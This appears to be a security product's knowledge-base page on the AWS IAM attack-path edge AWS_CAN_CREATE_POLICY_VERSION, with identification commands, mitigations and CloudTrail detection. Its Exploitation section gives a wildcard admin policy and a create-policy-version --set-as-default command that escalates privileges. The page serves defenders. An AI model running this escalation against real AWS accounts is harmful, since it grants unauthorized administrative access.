AWS_CAN_CREATE_POLICY_VERSION

Summary

FSProtect ACL Alias

Edge Type

Attack Path

Affected Object Types

IAM Users, IAM Roles, Customer Managed Policies

Exploitation Certainty

Certain

AWS IAM Action / Condition

iam:CreatePolicyVersion on target customer-managed policy ARN; critical when attacker can set the new version as default

Description

AWS_CAN_CREATE_POLICY_VERSION represents the ability to create a new version of an existing customer-managed IAM policy.

This is a high-impact privilege escalation path because an attacker can:

Add broad permissions (for example Action: "*", Resource: "*") to a new policy version.
Make that malicious version the default immediately (or later through AWS_CAN_SET_DEFAULT_POLICY_VERSION).
Inherit administrative permissions through every user/role/group already attached to that policy.

Because the policy attachment graph usually already exists, changing policy content through a new version can produce instant, large-scale privilege expansion.

Identification

AWS CLI

Check whether a principal can create policy versions:

aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::123456789012:user/AnalystUser \
  --action-names iam:CreatePolicyVersion \
  --resource-arns arn:aws:iam::123456789012:policy/TargetPolicy

Inspect target policy versions:

aws iam get-policy \
  --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy

aws iam list-policy-versions \
  --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy

AWS Console

Open IAM -> Policies.
Select a customer-managed policy.
Open Policy versions.
Review who can edit IAM policies and who can create a new policy version through delegated permissions.

Exploitation

AWS CLI

Create a malicious policy document:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

Create a new version and set it as default:

aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
  --policy-document file://admin-policy.json \
  --set-as-default

If --set-as-default is blocked but version creation is allowed, attackers can chain with AWS_CAN_SET_DEFAULT_POLICY_VERSION.

Mitigation

Restrict iam:CreatePolicyVersion to tightly controlled automation identities only.
Scope IAM permissions to explicit policy ARNs instead of wildcards.
Use permission boundaries and SCPs to block broad policy version manipulation.
Review and remove unused customer-managed policies and stale delegations.
Require approval workflows for policy version changes.

Detection

Monitor IAM policy version creation in CloudTrail:

Event source: iam.amazonaws.com
Event name: CreatePolicyVersion
High-signal indicator: requestParameters.setAsDefault = true

Example lookup:

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreatePolicyVersion

References

PreviousAWS_CAN_CREATE_LOGIN_PROFILE NextAWS_CAN_DELETE_ACCESS_KEY

Last updated 4 hours ago

Was this helpful?